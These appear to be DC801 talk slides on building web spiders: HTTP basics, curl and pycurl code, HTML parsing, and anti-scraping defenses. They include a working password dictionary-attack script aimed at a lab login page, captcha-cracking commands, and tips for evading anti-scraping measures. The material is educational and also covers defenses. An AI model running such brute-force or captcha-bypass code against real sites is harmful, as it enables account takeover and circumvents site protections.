
Web Spiders
https://github.com/obscuritysystems/webspiders
DC801 / 801 Labs
Lance Buttars AKA Nemus (@Lost_Nemus, nemus@grayhatlabs.com)

HTTP (Hypertext Transfer Protocol) What is a website? To a crawler or spider, a website is a file that is downloaded and analyzed. To users, websites are interactive programs, but to a spider a website is nothing more than a set of HTTP calls and web forms that become APIs.

HTTP Methods "OPTIONS" Only returns HTTP options available. "GET" - Return a resource. "HEAD" - Exactly Like GET, but only turns HTTP headers. "POST" - Creates a new resource. "PUT" - Send Data to the Server. "DELETE" - Delete Data from the Server. "TRACE" - Return the request headers sent by client. "CONNECT" - used with proxies that can dynamically switch to being a ssl tunnel. More info http://www.w3.org/protocols/rfc2616/rfc2616-sec9.html#sec9.9

HTTP GET Request

GET http://www.obscuritysystems.com HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0;)
Pragma: no-cache
Cache-control: no-cache
Content-Length: 0
Host: obscuritysystems.com

HTTP GET Response

HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Fri, 16 May 2014 03:22:29 GMT
Content-Type: text/html
Content-Length: 1475
Last-Modified: Fri, 16 Aug 2013 16:58:34 GMT
Connection: keep-alive
ETag: "520e5a3a-5c3"
Accept-Ranges: bytes
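
Both the request and the response above are just plain text over a TCP connection; a minimal sketch with Python's socket module shows the raw exchange (host and port are assumptions):

import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('www.obscuritysystems.com', 80))
s.send('GET / HTTP/1.1\r\nHost: obscuritysystems.com\r\nConnection: close\r\n\r\n')

response = ''
while True:                        # read until the server closes the connection
    chunk = s.recv(4096)
    if not chunk:
        break
    response += chunk
s.close()

print response.split('\r\n\r\n', 1)[0]   # print just the status line and headers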

Tamper Data - Firefox add-on for viewing and modifying HTTP requests: https://addons.mozilla.org/en-us/firefox/addon/tamper-data/


HTTP POST Request

POST http://dc801party/index.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
DNT: 1
Referer: http://dc801party/
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 186
Host: dc801party

HTTP POST Body

A POST body looks like parameter=value pairs, with & as the separator:

handle=nemus&firstname=lance&lastname=buttars

Example POST from the form above:

handle=nemus&firstname=lance&lastname=buttars&address1=12+Fake+Stree&address2=&city=Somwhere+vile&state=AL&zipcode=123456&email=nemus%40grayhatlabs.com&phone=asdfasdf&month=sd&year=asdf
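
The parameter=value&... encoding above is exactly what urllib.urlencode produces; a small sketch using field names from the example (note a dict does not guarantee field order):

import urllib  # Python 2

fields = {'handle': 'nemus', 'firstname': 'lance', 'lastname': 'buttars'}
body = urllib.urlencode(fields)    # percent-encodes values and joins pairs with &
print body                         # e.g. handle=nemus&lastname=buttars&firstname=lance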

HTTP POST Response

HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Fri, 16 May 2014 05:49:32 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.5.12

[HTML data in the response body]

HTTP Response Codes
200s are used for successes.
300s are for redirection of the client.
400s are used if there was a problem with the request or the client is not authorized.
500s are used if there was an error on the HTTP server.
Complete list of HTTP codes: http://en.wikipedia.org/wiki/List_of_HTTP_status_codes

Is Web Crawling Ethical? It depends. Can you scrape Google? Does the site say you cannot scrape it? Is the content copyrighted? Talk to a lawyer for more details (PS: I am not one). Regardless of legality, it is being done. Always check for an API first.

Response Codes of Note
200 OK
206 Partial Content
301 Moved Permanently
302 Moved Temporarily
401 Unauthorized
403 Forbidden
404 Not Found
500 Internal Server Error
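
A spider usually branches on these codes. With pycurl the numeric status is available after perform(); a minimal sketch (the URL is a placeholder):

import pycurl
import StringIO

c = pycurl.Curl()
b = StringIO.StringIO()
c.setopt(c.URL, 'http://www.obscuritysystems.com/')
c.setopt(pycurl.WRITEFUNCTION, b.write)
c.perform()

code = c.getinfo(pycurl.RESPONSE_CODE)   # numeric status of the last transfer
if code == 200:
    print 'OK'
elif 300 <= code < 400:
    print 'redirect'
elif code in (401, 403):
    print 'not authorized'
else:
    print 'error:', code
c.close()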

HTTP GET

GET /owaspbricks/content-2/index.php?user=harry HTTP/1.1
Host: 10.254.10.164
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://10.254.10.164/owaspbricks/content-pages.html
Cookie: PHPSESSID=g2b4vc2336d9pcbh0255rclit5; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada; JSESSIONID=891718788BC0E2F580A5394FBA979606
Connection: keep-alive

Result for GET Request [screenshot]

HTTP POST

POST /peruggia/index.php?action=login&check=1 HTTP/1.1
Host: x.x.x.164
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://10.254.10.164/peruggia/index.php?action=login
Cookie: PHPSESSID=g2b4vc2336d9pcbh0255rclit5; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada; JSESSIONID=891718788BC0E2F580A5394FBA979606
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 27

username=test&password=test

HTTP Request Headers
User-Agent - Mozilla/5.0 (Windows; U; Windows NT 6.1; en- (client information)
Accept-Language - en-us,en;q=0.5
Accept-Encoding - gzip,deflate
Cookie - PHPSESSID=et4dnatn161fv79rt437qhd056;
Referer - http://127.0.0.1/referer.php (contains the referring URL)
Authorization - Basic QXbab1VyOm14cGFzcw==

HTTP Response Headers
Content-Type - text/html; charset=utf-8
Content-Disposition - attachment; filename="test.zip"
Location - used for redirection if the response code is 301 or 302
Set-Cookie - sent when a website wants to update a cookie in your browser
Content-Encoding - gzip
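
To inspect response headers like these from a spider, pycurl can hand each raw header line to a callback; a minimal sketch (the URL is a placeholder):

import pycurl
import StringIO

headers = {}
def header_line(line):
    # called once per header line, e.g. 'Content-Type: text/html\r\n'
    if ':' in line:
        name, value = line.split(':', 1)
        headers[name.strip()] = value.strip()

c = pycurl.Curl()
b = StringIO.StringIO()
c.setopt(c.URL, 'http://www.obscuritysystems.com/')
c.setopt(pycurl.WRITEFUNCTION, b.write)
c.setopt(pycurl.HEADERFUNCTION, header_line)
c.perform()
c.close()

print headers.get('Content-Type'), headers.get('Set-Cookie')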

Curl CLI

# Curl: HTTP POST of login data.
curl --request POST 'http://www.test.com/login/' --data 'username=myusername&password=mypassword'

# Curl: send a search by adding URL parameters.
curl --request GET 'http://www.youtube.com/results?search_query=my_keyword'

# Curl: PUT request with data.
curl --request PUT 'http://www.test.com/restful/api/resource/12345/' --data 'email=person@gmail.com'

# Same, but use data.txt for the HTTP request body parameters.
curl --request PUT 'http://www.test.com/rest/api/user/12345/' --data @data.txt

# Curl with an HTTP header set.
curl --request GET 'http://www.test.com/user/info/' --header 'sessionid:1234567890987654321'

HTTP Basic Authentication
HTTP supports many different authentication techniques to limit access to pages and other resources. The most common is Basic auth: the client sends the user name and password as unencrypted base64-encoded text. It should only be used with HTTPS, as over plain HTTP the password can be easily captured and reused.
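
A sketch of two equivalent ways to send Basic auth with pycurl (the credentials and URL are made up); the Authorization header is just "Basic " plus base64("user:password"):

import pycurl
import base64
import StringIO

c = pycurl.Curl()
b = StringIO.StringIO()
c.setopt(c.URL, 'http://www.obscuritysystems.com/protected/')
c.setopt(pycurl.WRITEFUNCTION, b.write)

# Option 1: let curl build the Authorization header.
c.setopt(pycurl.HTTPAUTH, pycurl.HTTPAUTH_BASIC)
c.setopt(pycurl.USERPWD, 'myuser:mypassword')

# Option 2: build the same header by hand -- identical bytes on the wire.
# c.setopt(pycurl.HTTPHEADER,
#          ['Authorization: Basic ' + base64.b64encode('myuser:mypassword')])

c.perform()
print c.getinfo(pycurl.RESPONSE_CODE)   # 401 means the credentials were rejected
c.close()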

PyCurl Setup

import pycurl          # used to execute curl calls from Python
import urllib          # used to format parameters into an HTTP URL
import StringIO        # used to store curl results
from bs4 import BeautifulSoup  # library for parsing HTML content

c = pycurl.Curl()      # curl object
url = 'http://10.254.10.164/owaspbricks/content-1/index.php?'
attr = urllib.urlencode({'id': '1'})   # set id to 1
url = url + attr       # GET request: append the URL-encoded parameters to the URL

c.setopt(c.URL, url)                 # set the URL on the curl object
c.setopt(c.CONNECTTIMEOUT, 5)        # set the connection timeout to 5 seconds
c.setopt(pycurl.FOLLOWLOCATION, 1)   # if we get a Location header in the response, follow it
c.setopt(c.TIMEOUT, 8)               # maximum number of seconds curl is allowed to run
b = StringIO.StringIO()              # StringIO object that will collect the response
c.setopt(c.COOKIEFILE, '')           # the file to store the cookie data (empty = in-memory)
c.setopt(c.HTTPHEADER, ['Accept: application/html',
                        'Content-Type: application/x-www-form-urlencoded'])
c.setopt(pycurl.WRITEFUNCTION, b.write)

Let's Use Beautiful Soup to Parse This HTML

Parsing Web Pages

people = []
try:
    c.perform()                          # run pycurl
    html_doc = b.getvalue()
    soup = BeautifulSoup(html_doc)
    for fieldset in soup.find_all('fieldset'):
        user_id = fieldset.find_next('b').string
        user_name = fieldset.find_next('b').find_next('b').string
        user_email = fieldset.find_next('b').find_next('b').find_next('b').string
        person = {'user_id': user_id,
                  'user_email': user_email,
                  'user_name': user_name}
        people.append(person)
except pycurl.error, error:
    errno, errstr = error
    print 'An error occurred: ', errstr

HTTP Login Dictionary Attack

passwords = ['test', '1234', '4321', 'admin', 'badmin']
for password in passwords:
    c = pycurl.Curl()   # curl object
    url = 'http://10.24.10.164/peruggia/index.php?action=login&check=1'   # URL we are calling
    params = urllib.urlencode({'username': 'admin', 'password': password})
    c.setopt(c.POSTFIELDS, params)       # POST body: the login form fields
    c.setopt(c.URL, url)                 # set the URL on the curl object
    c.setopt(c.CONNECTTIMEOUT, 5)        # set the connection timeout to 5 seconds
    c.setopt(pycurl.FOLLOWLOCATION, 1)   # if we get a Location header in the response, follow it
    c.setopt(c.TIMEOUT, 8)               # maximum number of seconds curl is allowed to run
    c.setopt(c.COOKIEFILE, '')           # the file to store the cookie data
    #c.setopt(c.VERBOSE, True)           # display HTTP calls in the terminal
    c.setopt(pycurl.COOKIEJAR, 'cookie.txt')   # cookie file to store website cookie data
    b = StringIO.StringIO()              # StringIO object that will collect the response
    #c.setopt(c.PROXY, 'http://127.0.0.1:8080')   # debug calls in Burp Suite
    c.setopt(c.HTTPHEADER, ['Accept: application/html',
                            'Content-Type: application/x-www-form-urlencoded'])
    c.setopt(pycurl.WRITEFUNCTION, b.write)

HTTP Dictionary Attack 2 (loop body, continued)

    try:
        c.perform()                      # run pycurl
        html_doc = b.getvalue()          # get the HTML from StringIO
        soup = BeautifulSoup(html_doc)   # parse the HTML
        text = soup.get_text()           # get the page as plain text
        #print '------------------' + "\n"
        #print text
        #print '------------------' + "\n"
        if text.find('login') == -1:
            print "found password : " + password + "\n"
        else:
            print "password is not : " + password + "\n"
    except pycurl.error, error:
        errno, errstr = error
        print 'An error occurred: ', errstr

Cat and Mouse: Screen Scraping vs. Preventing Screen Scraping

Defense: use captchas after so many failed login attempts.
Defense: blacklist IP addresses with multiple failed requests; assume malicious intent from an IP address whose requests keep coming to those pages.
Defense: lock out users after so many attempts.
Defense: obscure content by using JavaScript obfuscation. Counter: use random proxies for requests (VPSes and proxy services are cheap).
Defense: create honey links in robots.txt, links that have nothing to do with your website.
Counter: OCR the captchas, pass them to real users, or take advantage of audio captchas using voice-to-text parsers. All of this might stop most crawlers, but it won't stop someone who is persistent.
Defense: track requests per IP address and start requiring a captcha after X similar requests (see the sketch after this list).
Defense: use proactive measures, like a website policy forbidding scraping and limiting results per request, and reactive measures, like policing by monitoring physical and Internet (IP address) identities.
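
The per-IP tracking defense above fits in a few lines; a minimal sketch (the window and threshold are assumed values):

import time
from collections import defaultdict

WINDOW = 60      # seconds to look back (assumed value)
THRESHOLD = 30   # requests per window before demanding a captcha (assumed value)
hits = defaultdict(list)   # ip -> timestamps of recent requests

def needs_captcha(ip):
    now = time.time()
    hits[ip] = [t for t in hits[ip] if now - t < WINDOW]   # drop old entries
    hits[ip].append(now)
    return len(hits[ip]) > THRESHOLD   # too many similar requests: challenge this IP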

Captchas
Good captchas can't be recognized by standard optical character recognition. Don't store the answer in hidden form fields. Is the use of a captcha worth the hassle to legitimate users? Don't use HTML to render the challenge. Don't use trivial questions such as addition or images.

"Spam is not the user's problem; it is the problem of the business that is providing the website. It is arrogant and lazy to try and push the problem onto a website's visitors." - Tim Kadlec, Death To CAPTCHAs

Captcha Intruder (CIntruder)
http://cintruder.sourceforge.net/

python cintruder --crack http://host.com/path/captcha.gif
python cintruder list

More on captcha solving:
http://ptigas.com/blog/2011/02/18/simple-captcha-solver-in-python/
http://www.boyter.org/decoding-captchas/#technologyused
http://www.debasish.in/2012/01/bypass-captcha-using-python-and.html

reCAPTCHA
reCAPTCHA creates some productivity out of captchas. One word can be deciphered using OCR; the second is a word, taken from a book, that OCR failed to decipher. Actually, both words were originally undecipherable by OCR, but one word, the control case, has been confirmed to be identified correctly. The second word has not yet had a large enough base of consistent answers to correctly determine what word it is.

Multi-Factor Authentication
YubiKey
RSA keys
Swekey
One-time passwords

Spam Filtering and HTTP Defense
Akismet - a hosted web service that automatically detects comment and trackback spam for blogs.
ModSecurity - web application firewall: http://www.modsecurity.org/
SBLAM - anti-spam filter for forms: http://sblam.com/en.html
Inspekt - input validation library

Cool Tools
Selenium - automates a browser, so it can get past JavaScript.
OWASP ZAP (Zed Attack Proxy) - GUI with the ability to program web spiders from HTTP requests captured through a web proxy.
Burp Suite - free to download, with a yearly cost for the full version. More polished than ZAP; contains many of the same features.

More Information
Scraping: Webbots, Spiders, and Screen Scrapers, 2nd Edition by Michael Schrenk (No Starch Press)
OWASP project: https://www.owasp.org/
Background image from http://cartelthemes.com/3d-green-d-wallpaper-hd-34199hd-wallpapers-background.htm